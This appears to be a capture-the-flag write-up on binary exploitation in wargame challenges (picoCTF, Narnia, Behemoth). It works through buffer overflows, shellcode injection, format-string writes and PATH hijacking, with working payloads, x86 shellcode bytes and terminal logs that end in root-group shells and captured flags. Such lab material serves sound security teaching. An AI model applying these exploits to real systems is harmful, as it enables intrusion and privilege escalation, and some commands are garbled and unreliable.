In another challenge below, It can be easily seen the value of secret can be changed after entering 16 characters + 0xc0deface. As, 0xc0deface can’t be printed as ASCII characters, you can use python to pass the input.
python -c ' print "A" * 16 + "\xc0\xde\xfa\xce"' or python -c ' print "A" * 16 + "\xce\xfa\xde\xc0"' based on the endianess of the system.void give_shell(){ gid\_t gid = getegid(); setresgid(gid, gid,gid); system("/bin/sh -i"); } void vuln(char \*input){ char buf[16]; int secret = 0; strcpy(buf,input); if (secret == 0xc0deface){ give_shell(); }else{ printf("The secret is %x\n", secret); } } int main(int argc, char \*\*argv) { if (argc > 1) vuln(argv[1]); return 0; }
Controlling the EIP: In the below challenge, an attacker can use a buffer overflow to take control of the program’s execution. the return address for the call to vuln function is above buf on the stack, so it can be overwritten with an overflow. this allows an attacker to put nearly any address they desire in place of the return address. in this example, the goal is to call the give_shell function.
We need to find the address of give_shell function which can be done either by using gdb and print give_shell or objdump -d outputfile | grep give_shell.
To know the EIP offset, you can use cyclic patterns. Use pattern_create.rb and pattern_offset.rb So pattern_create.rb 100 for instance will create a 100 byte cyclic pattern.
Then you feed this as your input to the vulnerable program and it will crash. so get the value of EIP at that point.
Then, we just need to pass the input to the program by
./a.out $(python -c ' print "A" \* Offset + "Address of give\_shell in hex"' )#include <stdio.h> #include <stdlib.h> #include <string.h> /* This never gets called! */ void give_shell(){ gid_t gid = getegid(); setresgid(gid, gid, gid); system("/bin/sh -i"); } void vuln(char *input){ char buf[16]; strcpy(buf, input); } int main(int argc, char **argv){ if (argc > 1) vuln(argv[1]); return 0; }
Execute Me: If you check the below code, getegid() function shall return the effective group ID of the calling process., setresuid() sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process. If you see, read function read the stdin into the buffer and (function_ptf) buf() function is called which would call anything in the buffer.
Since, buf will execute anything, we need a shell code to fit in 128 bytes, There are plenty of shellcode (with different platforms and different working)which can be found on Shell-Storm.
Then, we just need to pass the input to the program by
./a.out $(python -c ' print "A" \* Offset + "Address of give\_shell in hex"' )#include <stdio.h> #include <stdlib.h> int token = 0; typedef void (*function_ptr)(); void be_nice_to_people(){ gid_t gid = getegid(); setresgid(gid, gid, gid); } int main(int argc, char **argv){ char buf[128]; be_nice_to_people(); read(0, buf, 128); ((function_ptr)buf)(); }
ROP1: This binary is running on a machine with ASLR! (Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.) Can you bypass it?
From the code provided we can see that there’s a buffer overflow in the vuln() function due to the strcpy() call. run the program within gdb and see what the state of the registers and the stack are at the time of the crash.
From the cylic patterns tools, we could find that offset is at 76 which could be confirmed by providing a input of 76 “A”s and 4 “B”s to overwrite EIP. set a breakpoint after the call to strcpy(); that is *vuln+24. After the leave instruction is executed, EIP will be set to 0x424242.
EAX points to our buffer of “A”s and since the binary doesn’t have the NX bit, we can execute shellcode on the stack. To bypass ASLR, we just need to find an address that will do a JMP/CALL EAX and set that as our return address. msfelfscan can find a list of instructions to accomplish this:
Since the binary is compiled for 32 bit, searching the shellcode in Shellstorm for Linux_x86 executing /bin/sh, we get 21 bytes shellcode in kernelpanic.
As EAX contains the 76*A + BBBB when the vuln function returns, we just need to find address which will execute JMP EAX, it can be found by msfelfscan -j eax binary_file
One more small but important observation is the number of NOPs, as our shellcode is 21 bytes and offset is 76 bytes and jmp is 4 bytes. So, 76 - 21 - 4 = 51.
import struct code = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" jmpeax = struct.pack("<I",0x080483e7) print "\x90"*51 + code + jmpeax#include <stdio.h> #include <string.h> #include <stdlib.h> void be_nice_to_people(){ gid_t gid = getegid(); setresgid(gid, gid, gid); } void vuln(char *name){ char buf[64]; strcpy(buf, name); } int main(int argc, char **argv){ be_nice_to_people(); if(argc > 1) vuln(argv[1]); return 0; }
Format String Examples
Let’s see a simple example of a format string vulnerabilty.
Narnia5
include <stdio.h> include <stdlib.h> include <string.h> int main(int argc, char \*\*argv){ int i = 1; char buffer[64]; snprintf(buffer, sizeof buffer, argv[1]); buffer[sizeof (buffer) - 1] = 0; printf("Change i's value from 1 -> 500. "); if(i==500){ printf("GOOD\n"); system("/bin/sh"); } printf("No way...let me give you a hint!\n"); printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); printf ("i = %d (%p)\n", i, &i); return 0; }Let’s try to see what’s on stack and if we can put something on stack and change the value of i.
narnia5@melinda:~$ /narnia/narnia5 %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Change i's value from 1 -> 500. No way...let me give you a hint! buffer : [f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.62653766.36656436.6666662e.] (63) i = 1 (0xffffd6cc) narnia5@melinda:~$ /narnia/narnia5 AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Change i's value from 1 -> 500. No way...let me give you a hint! buffer : [AAAAf7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.41414141.62653766.36656] (63) i = 1 (0xffffd6cc) narnia5@melinda:~$ /narnia/narnia5 ``python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'`` Change i's value from 1 -> 500. No way...let me give you a hint! buffer : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.ffffd6cc.62653766.36656] (63) i = 1 (0xffffd6cc) narnia5@melinda:~$ /narnia/narnia5 ``python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08n.%08x.%08x.%08x"'`` Change i's value from 1 -> 500. No way...let me give you a hint! buffer : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8..62653766.36656436.6666] (63) i = 40 (0xffffd6cc) narnia5@melinda:~$ /narnia/narnia5 ``python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%468x.%08n.%08x.%08x.%08x"'`` Change i's value from 1 -> 500. GOOD $
In this example, let’s see use of arbitary writing an address Narnia7
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdlib.h> #include <unistd.h> int goodfunction(); int hackedfunction(); int vuln(const char *format){ char buffer[128]; int (*ptrf)(); memset(buffer, 0, sizeof(buffer)); printf("goodfunction() = %p\n", goodfunction); printf("hackedfunction() = %p\n\n", hackedfunction); ptrf = goodfunction; printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf); printf("I guess you want to come to the hackedfunction...\n"); sleep(2); ptrf = goodfunction; snprintf(buffer, sizeof buffer, format); return ptrf(); } int main(int argc, char **argv){ if (argc <= 1){ fprintf(stderr, "Usage: %s <buffer>\n", argv[0]); exit(-1); } exit(vuln(argv[1])); } int goodfunction(){ printf("Welcome to the goodfunction, but i said the Hackedfunction..\n"); fflush(stdout); return 0; } int hackedfunction(){ printf("Way to go!!!!"); fflush(stdout); system("/bin/sh"); return 0; }If we see, the program provides us with the address of the ptrf pointer, goodfunction and bad function. The ptrf is assigned the address of goodfunction if we somehow change it to address of the badfunction, we can get a shell. Let’s run the program and see what are the address we get.
./narnia71 A goodfunction() = 0x804871f hackedfunction() = 0x8048745 before : ptrf() = 0x804871f (0xffb4450c) I guess you want to come to the hackedfunction... Welcome to the goodfunction, but i said the Hackedfunction..and
narnia7@melinda:/narnia$ ./narnia7 A goodfunction() = 0x80486e0 hackedfunction() = 0x8048706 before : ptrf() = 0x80486e0 (0xffffd64c) I guess you want to come to the hackedfunction... Welcome to the goodfunction, but i said the Hackedfunction..The reason I have added two running instances is because in the first instance the address is different by one byte 0x1f and 0x45 where as in the second instance the address differs by two bytes 0x86e0 and 0x8706. We can write two bytes by %hn and one byte by %hhn. We can write whole 4 byte address by following a formula
If HOB < LOB HOB:0x0804 LOB:0x8706 [addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff %.[HOB - 8]x = 0x804 - 8 = 7FC (2044) = %.2044x %[offset]$hn = %6\$hn %.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x %[offset+1]$hn = %7\$hn `python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" +"%.2044x%6\$hn %.32514x%7\$hn"'`We also need to find the offset where the address is stored which can be done by two methods: Either compiling the program on local machine and checking the buffer just after snprintf
gdb-peda$ p buffer $2 = "AAAA.000008a2.f7fdeb58.f7fde860.0804835c.0804871f.41414141.3030302e.61383030", '\000' <repeats 51 times>or by using ltrace
narnia7@melinda:/narnia$ ltrace ./narnia7 `python -c 'print "AAAA" + ".%08x"*7'` __libc_start_main(0x804868f, 2, 0xffffd764, 0x8048740 <unfinished ...> memset(0xffffd620, '\0', 128) = 0xffffd620 printf("goodfunction() = %p\n", 0x80486e0goodfunction() = 0x80486e0 ) = 27 ) = 30 printf("before : ptrf() = %p (%p)\n", 0x80486e0, 0xffffd61cbefore : ptrf() = 0x80486e0 (0xffffd61c) ) = 41 puts("I guess you want to come to the "...I guess you want to come to the hackedfunction... printf("hackedfunction() = %p\n\n", 0x8048706hackedfunction() = 0x8048706 ) = 50 sleep(2) = 0 snprintf("AAAA.08048238.ffffd678.f7ffda94."..., 128, "AAAA.%08x.%08x.%08x.%08x.%08x.%0"..., 0x8048238, 0xffffd678, 0xf7ffda94, 0, 0x80486e0, 0x41414141, 0x3038302e) = 67 puts("Welcome to the goodfunction, but"...Welcome to the goodfunction, but i said the Hackedfunction.. ) = 61 fflush(0xf7fcaac0) = 0 exit(0 <no return ...> +++ exited (status 0) +++If you see 0x41414141 is at offset 6.
gdb-peda$ p ptrf $3 = (int (*)()) 0x804871f <goodfunction> gdb-peda$ p &ptrf $4 = (int (**)()) 0xffffd2ec gdb-peda$ x /10xb 0xfffd3ea 0xfffd3ea: Cannot access memory at address 0xfffd3ea gdb-peda$ x /10xb 0xffffd3ea 0xffffd3ea: 0x3f 0x77 0x00 0x00 0x00 0x00 0x00 0x00 0xffffd3f2: 0x00 0x00 gdb-peda$ x /10xb 0xffffd2ea 0xffffd2ea: 0x04 0x08 0x1f 0x87 0x04 0x08 0x41 0x41 0xffffd2f2: 0x41 0x41 gdb-peda$ p goodfunction $5 = {int ()} 0x804871f <goodfunction> gdb-peda$ p ha hackedfunction hasmntopt gdb-peda$ p hackedfunction $6 = {int ()} 0x8048745 <hackedfunction>gdb-peda$ p &ptrf $10 = (int (**)()) 0xffffd2fc gdb-peda$ run `python -c 'print "\xfc\xd2\xff\xff" + ".%08x"*5 + "%hhn"'` gdb-peda$ p ptrf $12 = (int (*)()) 0x8048731 <goodfunction+18> gdb-peda$ x /10xb 0xffffd2fa 0xffffd2fa: 0x04 0x08 0x31 0x87 0x04 0x08 0xfc 0xd2 0xffffd302: 0xff 0xff
Let’s see another example Behemoth3 where we have only the assembly code of the program and we exploit this by two methods by overwriting the GOT address or overwriting the return address.
Assembly Source Code:
(gdb) disassemble main Dump of assembler code for function main: 0x0804847d <+0>: push %ebp 0x0804847e <+1>: mov %esp,%ebp 0x08048480 <+3>: and $0xfffffff0,%esp 0x08048483 <+6>: sub $0xe0,%esp 0x08048489 <+12>: movl $0x8048570,(%esp) 0x08048490 <+19>: call 0x8048330 <printf@plt> 0x08048495 <+24>: mov 0x80497a4,%eax 0x0804849a <+29>: mov %eax,0x8(%esp) 0x0804849e <+33>: movl $0xc8,0x4(%esp) 0x080484a6 <+41>: lea 0x18(%esp),%eax 0x080484aa <+45>: mov %eax,(%esp) 0x080484ad <+48>: call 0x8048340 <fgets@plt> 0x080484b2 <+53>: movl $0x8048584,(%esp) 0x080484b9 <+60>: call 0x8048330 <printf@plt> 0x080484be <+65>: lea 0x18(%esp),%eax 0x080484c2 <+69>: mov %eax,(%esp) 0x080484c5 <+72>: call 0x8048330 <printf@plt> 0x080484ca <+77>: movl $0x804858e,(%esp) 0x080484d1 <+84>: call 0x8048350 <puts@plt> 0x080484d6 <+89>: mov $0x0,%eax 0x080484db <+94>: leave 0x080484dc <+95>: ret End of assembler dump.Observed Behavior:
behemoth3@melinda:/tmp/rahul3$ ./behemoth3 Identify yourself: HelloCheck123 Welcome, HelloCheck123 aaaand goodbye again.Well, we tried to provide a very large input to the Identify yourself, but it didn’t not gave a segmentation fault. Let’s try format string:
behemoth3@melinda:/tmp/rahul3$ echo `python -c 'print "A"*4 + ".%08x"*7'` | ./behemoth3 Identify yourself: Welcome, AAAA.000000c8.f7fcac20.00000000.00000000.f7ffd000.41414141.3830252e aaaand goodbye again.Trying simple format string provided us with the offset of our format string. Now we can write almost any address with any value with our input. Before that let’s put a environment variable shellcode and check it’s address:
export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`Let’s core dump the binary using %s and examine the core. Our shellcode can be reached at 0xffffd8f0
Either we can overwrite the return address (main+95): Let’s debug the program set the breakpoint at main+95 and see the value of $esp which would be use to find the return address when binary is executed without gdb. The valueis 0xf7e3ba63 and the return address which needed to be overwrriten is 0xffffd65c. Let’s again core dump the binary to see the return address without gdb.
(gdb) find $esp,+2000,0xf7e3ba63 0xffffd66c 1 pattern found.So, if we overwrite the return address at 0xffffd66c with our shellcode value of 0xffffd8f0, we should get a shell.
python -c 'print "\x5e\xd6\xff\xff\x5c\xd6\xff\xff" +"%.65527x%6$hn %.55503x%7$hn"' > input98This is little tricky because we might have to guess the return address without gdb. Previously it was coming 0xffffd66c but we got shell using 0xffffd65c.
overwrite the puts GOT address: Find the GOT address of puts which is 0x08049790 and overwrite it with
python -c 'print "\x92\x97\x04\x08\x90\x97\x04\x08" +"%.65527x%6$hn %.55503x%7$hn"'
In the below code, if we can somehow set the value of secret to 1337, we can get a shell on the system to read the flag. Also, the printf function directly prints the argument whatever is passed by the user. By concepts above, we need to find the address of secret and write to it. Address of the secret can be found by gdb or objdump. Either the address would be already present on stack or it can be put on stack.
#include <stdio.h> #include <stdlib.h> #include <fcntl.h> int secret = 0; void give_shell(){ gid_t gid = getegid(); setresgid(gid, gid, gid); system("/bin/sh -i"); } int main(int argc, char **argv){ int *ptr = &secret; printf(argv[1]); if (secret == 1337){ give_shell(); } return 0; }Reading the address
pico83515@shell:/home/format$ gdb -q format Reading symbols from format...(no debugging symbols found)...done. (gdb) p $secret $1 = void (gdb) p &secret $2 = (<data variable, no debug info> *) 0x804a030 <secret>Now we have to find whether is this address present on the stack? If not, we can put this address on the stack because of the format string vulnerability.
pico83515@shell:/home/format$ ./format %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x ffffd774.ffffd780.f7e4f39d.f7fc83c4.f7ffd000.0804852b.0804a030.08048520.00000000We see that the address is present on the stack at the seventh position. Otherwise, we can put it on the stack by
for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x;echo ;done | grep 4141What this is doing is “Extracting particular stack content by “%$i$x”. As we have seen in DMA, $x can be used to extract particular stack content and reading it. $i value changes from 1-256. However, as you add more data, the offset of your original input changes, so go ahead and add 1333 more bytes of data and see what the offset is then. (1337 is what we want to put into secret, and we will have written four bytes (AAAA), so 1333+4 = 1337)
or i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333u;echo ;done | grep 4141 Offset: 103:AAAA41410074 Offset: 104:AAAA31254141So we found our A’s again, but they aren’t aligned on the stack. Lets add two more A’s at the end to see if we can get it to line up.
for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333uAA;echo ;done | grep 41414141 Offset: 103:AAAA41414141It looks like the address 0x0804a030 is getting placed in *ptr. That’s the address we need to use in place of our A’s. In order to place the number 1337 into secret’s memory address, we need to use the %n modifier. (%103$n will look at the data located at offset 103 as a memory address, and write the total number of bytes we have written so far into that address.)
pico1139@shell:/home/format$: env -i ./format $:`(python -c 'print "\x30\xa0\x04\x08"+"%1333u%103`\ nAA"') $ id uid=11066(pico1139) gid=1008(format) groups=1017(picogroup) $ ls Makefile flag.txt format format.c $ cat flag.txt who\_thought\_%n\_was\_a\_good\_idea?Otherwise as the address at the seventh is already present on stack we can also do
plain pico83515@shell:/home/format$ ./format "%1337u%7$n"We used DMA to access the memory, so written 1337 directly at the address pointed by the 7th position. Otherwise, we can use the basic
./format %08x.%08x.%08x.%08x.%08x.%1292u%nIf you see, we did 5 stack pop-up by using %08x, written the value to be written at 6th position and 7th position contains the address of secret. If you further see “%08x.” is of eight characters + 1 of “.” or 9 bytes, used five times i.e 9*5=45 bytes and 1292+45 == 1337.
In another example below,
#include <stdlib.h> #include <stdio.h> #include <unistd.h> #define BUFSIZE 256 void greet(int length){ char buf[BUFSIZE]; puts("What is your name?"); read(0, buf, length); printf("Hello, %s\n!", buf); } void be_nice_to_people(){ gid_t gid = getegid(); setresgid(gid, gid, gid); } int main(int argc, char **argv){ int length; be_nice_to_people(); puts("How long is your name?"); scanf("%d", &length); if(length < BUFSIZE) //don't allow buffer overflow greet(length); else puts("Length was too long!"); }This program tries to prevent buffer overflows by first asking for the input length. It disregards the rest of the ouput. However, the program uses scanf. If we supply -1 as the length, we can bypass the overflow check: readelf -l no_overflow can be used to find if there’s any protection on the binary. Stack is executable, Furthermore, ASLR is not enabled. This makes it easy to stick in a shellcode plus a NOP sled and return to an address on the stack
pico1139@shell:/home/no_overflow$ (echo -1; python -c 'print "A"*268+"\xd0\xd6\xff\xff"+"\x90"*200+" "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'; cat) | ./no_overflow How long is your name? What is your name? Hello, AAAAAAAAAAAAAAAAAAAAAA...snip... id uid=11066(pico1139) gid=1007(no_overflow) groups=1017(picogroup) cat flag.txt what_is_your_sign
In an another example where stack is not executable, If you read the code, you would find, we need to change the file_name from not_the_flag.txt to flag.txt. In this example, they provided the address of the string “not_the_flag.txt” as 0x08048777. By putting a break point in puts in gdb and looking for the address of flag.txt.
(gdb) br *puts Breakpoint 1 at 0x8048460 (gdb) run Starting program: /home/what_the_flag/what_the_flag Breakpoint 1, 0xf7e81ee0 in puts () from /lib/i386-linux-gnu/libc.so.6 (gdb) x/s 0x08048777 0x8048777: "not_the_flag.txt" (gdb) x/s 0x08048778 0x8048778: "ot_the_flag.txt" (gdb) x/s 0x08048770 0x8048770: "le: %s" (gdb) x/s 0x0804877C 0x804877c: "he_flag.txt" (gdb) x/s 0x0804877D 0x804877d: "e_flag.txt" (gdb) x/s 0x0804877E 0x804877e: "_flag.txt" (gdb) x/s 0x0804877F 0x804877f: "flag.txt"#include <stdlib.h> #include <stdio.h> struct message_data{ char message[128]; char password[16]; char *file_name; }; void read_file(char *buf, char *file_path, size_t len){ FILE *file; if(file= fopen(file_path, "r")){ fgets(buf, len, file); fclose(file); }else{ sprintf(buf, "Cannot read file: %s", file_path); } } int main(int argc, char **argv){ struct message_data data; data.file_name = "not_the_flag.txt"; puts("Enter your password too see the message:"); gets(data.password); if(!strcmp(data.password, "1337_P455W0RD")){ read_file(data.message, data.file_name, sizeof(data.message)); puts(data.message); }else{ puts("Incorrect password!"); } return 0; }So we’ll ovewrite the file pointer with 0x804877f to make it read flag.txt. From gets()’s manual: gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (‘\0’). No check for buffer overrun is performed (see BUGS below). So by using the following input, we can overwrite the file pointer and still provide the correct password:
1337_P455W0RD 1337_P455W0RD\0aa\x7f\x87\x04\x08 aa\x7f\x87\x04\x08We use this in the command line to get the flag
pico83515@shell:/home/what_the_flag$ printf "1337_P455W0RD\0bb\x7f\x87\x04\x08" | ./what_the_flag Enter your password too see the message: Congratulations! Here is the flag: who_needs_%eip pico83515@shell:/home/what_the_flag$
Miscellanous Examples
Let’s see some miscellanous examples away from Buffer/Format Vulnerabilities.
So, we have a binary which when executed gives
behemoth2@melinda:/behemoth$ ./behemoth2 touch: cannot touch '13373': Permission deniedLet’s see what ltrace provides us
behemoth2@melinda:/behemoth$ ltrace ./behemoth2 __libc_start_main(0x804856d, 1, 0xffffd794, 0x8048640 <unfinished ...> getpid() = 14118 sprintf("touch 14118", "touch %d", 14118) = 11 __lxstat(3, "14118", 0xffffd688) = -1 unlink("14118") = -1 system("touch 14118"touch: cannot touch '14118': Permission denied <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 256 sleep(2000Let’s see a truncated output of disassemble main, if we see getpid gets the binary pid, sprintf something in some buffer, lstat provides thefile status, unlink -call the unlink function to remove the specified file.
(gdb) disassemble main Dump of assembler code for function main: 0x08048588 <+27>: call 0x8048410 <getpid@plt> 0x080485b3 <+70>: call 0x8048450 <sprintf@plt> 0x080485c7 <+90>: call 0x80486c0 <lstat> 0x080485df <+114>: call 0x8048400 <unlink@plt> 0x080485eb <+126>: call 0x8048420 <system@plt> 0x080485f7 <+138>: call 0x80483e0 <sleep@plt> 0x08048616 <+169>: call 0x8048420 <system@plt> 0x08048635 <+200>: leave 0x08048636 <+201>: retIf you check the ltrace output
system("touch 14118"touch: cannot touch '14118': Permission deniedtouch is being called without an absolute path, so we can take advantage of that. First we’ll create our own touch script that prints out the contents /etc/behemoth_pass/behemoth3. Next, the PATH variable needs to be updated so that it looks at the current working directory first to ensure that our touch script is executed and not the actual touch program. PATH=/tmp:$PATH, you set /tmp to your primary location to search for binaries and the like… so if you create a file in /tmp/ called touch, it’ll actually execute that instead of /usr/bin/touch
behemoth2@melinda:/tmp/rahul2$ cat touch cat /etc/behemoth_pass/behemoth3 behemoth2@melinda:/tmp/rahul2$ history | grep PATH 19 history | grep PATH behemoth2@melinda:/tmp/rahul2$ PATH=/tmp/rahul2:$PATH /behemoth/behemoth2 **********